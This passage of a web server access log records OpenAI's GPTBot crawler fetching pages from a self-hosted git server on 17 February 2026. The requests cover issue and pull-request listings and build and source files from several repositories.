+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15198] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13287] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13314] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13311] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15197] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:18:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:18:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12807] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15373] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 10244] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:18:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:18:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 